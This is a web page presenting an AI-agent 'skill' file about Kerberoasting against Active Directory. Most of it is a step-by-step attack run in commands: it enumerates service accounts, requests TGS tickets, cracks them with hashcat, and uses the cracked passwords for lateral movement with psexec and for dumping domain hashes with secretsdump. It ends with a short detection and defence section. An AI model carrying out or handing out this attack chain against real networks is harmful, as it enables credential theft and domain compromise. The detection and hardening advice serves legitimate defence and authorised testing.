exploiting-kerberoasting-with-impacket

Name: exploiting-kerberoasting-with-impacket
Author: mukul975/Anthropic-Cybersecurity-Skills

$npx mdskill add mukul975/Anthropic-Cybersecurity-Skills/exploiting-kerberoasting-with-impacket

Crack AD service account hashes via Kerberoasting attacks.

Extracts SPNs to generate offline-crackable TGS tickets.
Depends on Impacket GetUserSPNs and hashcat.
Validates domain credentials and network reachability.
Outputs cracked NTLM hashes for credential access.

SKILL.md

.github/skills/exploiting-kerberoasting-with-impacketView on GitHub ↗

---
name: exploiting-kerberoasting-with-impacket
description: Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active Directory service accounts.
domain: cybersecurity
subdomain: red-teaming
tags: [kerberoasting, impacket, active-directory, credential-access, kerberos, t1558-003, service-accounts]
version: "1.0"
author: mahipal
license: Apache-2.0
---

# Exploiting Kerberoasting with Impacket

## Overview

Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's `GetUserSPNs.py` is the standard tool for Linux-based Kerberoasting attacks.


## When to Use

- When performing authorized security testing that involves exploiting kerberoasting with impacket
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding

## Prerequisites

- Valid domain credentials (any domain user can request TGS tickets)
- Network access to a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
- Impacket installed (`pip install impacket`)
- Hashcat or John the Ripper for offline cracking
- Wordlist (e.g., rockyou.txt, SecLists)


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## MITRE ATT&CK Mapping

| Technique ID | Name | Tactic |
|---|---|---|
| T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Credential Access |
| T1087.002 | Account Discovery: Domain Account | Discovery |
| T1110.002 | Brute Force: Password Cracking | Credential Access |

## Step 1: Enumerate Kerberoastable Accounts

```bash
# List all user accounts with SPNs (without requesting tickets)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1

# Output example:
# ServicePrincipalName          Name        MemberOf                          PasswordLastSet
# ----------------------------  ----------  --------------------------------  -------------------
# MSSQLSvc/SQL01.corp.local     svc_sql     CN=Domain Admins,CN=Users,...     2023-01-15 10:30:22
# HTTP/web01.corp.local         svc_web     CN=Web Admins,CN=Users,...        2024-03-20 14:15:00
# HOST/backup01.corp.local      svc_backup  CN=Backup Operators,CN=Users,...  2022-06-01 08:45:10
```

## Step 2: Request TGS Tickets

```bash
# Request TGS tickets for all Kerberoastable accounts
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# Request ticket for a specific SPN
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
  -request-user svc_sql

# Output format (hashcat-compatible):
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...

# Save to file for cracking
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
  -request -outputfile kerberoast_hashes.txt

# Using NTLM hash instead of password (Pass-the-Hash)
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
  -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# Request AES tickets (if available)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
  -request -outputfile hashes.txt
```

## Step 3: Crack TGS Tickets Offline

```bash
# Hashcat - RC4 encrypted tickets (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
  --rules-file /usr/share/hashcat/rules/best64.rule

# Hashcat - AES-256 encrypted tickets (mode 19700)
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt

# Check results
hashcat -m 13100 kerberoast_hashes.txt --show
# $krb5tgs$23$*svc_sql$CORP.LOCAL$...*$...:Summer2024!
```

## Step 4: Validate and Use Cracked Credentials

```bash
# Verify cracked credentials
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local

# Check for local admin access
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth

# Use credentials for lateral movement
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local

# If service account is Domain Admin
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm
```

## Alternative Tools

### Rubeus (Windows)

```powershell
# Kerberoast all accounts
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt

# Request RC4-only tickets (easier to crack)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

# Kerberoast with AES
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt
```

### PowerView (PowerShell)

```powershell
Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
```

## Targeted Kerberoasting

High-value targets for Kerberoasting:

| Account Type | Why | Risk |
|---|---|---|
| Service accounts in Domain Admins | Direct path to domain compromise | Critical |
| SQL service accounts (MSSQLSvc) | Often have excessive privileges | High |
| Exchange service accounts | Access to all email | High |
| Accounts with AdminCount=1 | Previously/currently privileged | High |
| Accounts with old passwords | More likely to use weak passwords | Medium |

## Detection

### Windows Event Logs

```
Event ID 4769 - Kerberos Service Ticket Request
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
- Monitor for: Single user requesting many TGS tickets in short period
- Monitor for: Service ticket requests from unusual source IPs
```

### Sigma Rule

```yaml
title: Potential Kerberoasting Activity
status: stable
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TicketEncryptionType: '0x17'  # RC4
        ServiceName|endswith: '$'
    filter:
        ServiceName: 'krbtgt'
    condition: selection and not filter
level: medium
tags:
    - attack.credential_access
    - attack.t1558.003
```

## Defensive Recommendations

1. **Use Group Managed Service Accounts (gMSA)** - 240-character random passwords, auto-rotated
2. **Set strong passwords (25+ chars)** on all service accounts
3. **Enable AES-only encryption** - Disable RC4 via GPO
4. **Monitor Event ID 4769** for RC4 TGS requests
5. **Implement Managed Service Accounts** where gMSA is not feasible
6. **Regular audits** - Run BloodHound to identify Kerberoastable accounts
7. **Protected Users group** - Add sensitive service accounts
8. **Honeypot SPNs** - Create decoy accounts with SPNs to detect attacks

## References

- MITRE ATT&CK T1558.003: https://attack.mitre.org/techniques/T1558/003/
- Impacket: https://github.com/fortra/impacket
- Harmj0y's Kerberoasting Revisited: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
- Detection Strategy DET0157: https://attack.mitre.org/detectionstrategies/DET0157/

More from mukul975/Anthropic-Cybersecurity-Skills

Skill	Description
acquiring-disk-image-with-dd-and-dcfldd	Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through hash verification.
analyzing-active-directory-acl-abuse	Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and WriteOwner abuse paths
analyzing-android-malware-with-apktool	Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source recovery, and androguard for permission analysis, manifest inspection, and suspicious API call detection.
analyzing-api-gateway-access-logs	>
analyzing-apt-group-with-mitre-navigator	Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap analysis and threat-informed defense.
analyzing-azure-activity-logs-for-threats	>
analyzing-bootkit-and-rootkit-samples	>
analyzing-browser-forensics-with-hindsight	Analyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
analyzing-campaign-attribution-evidence	Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attr
analyzing-certificate-transparency-for-phishing	Monitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates, and unauthorized certificate issuance targeting your organization.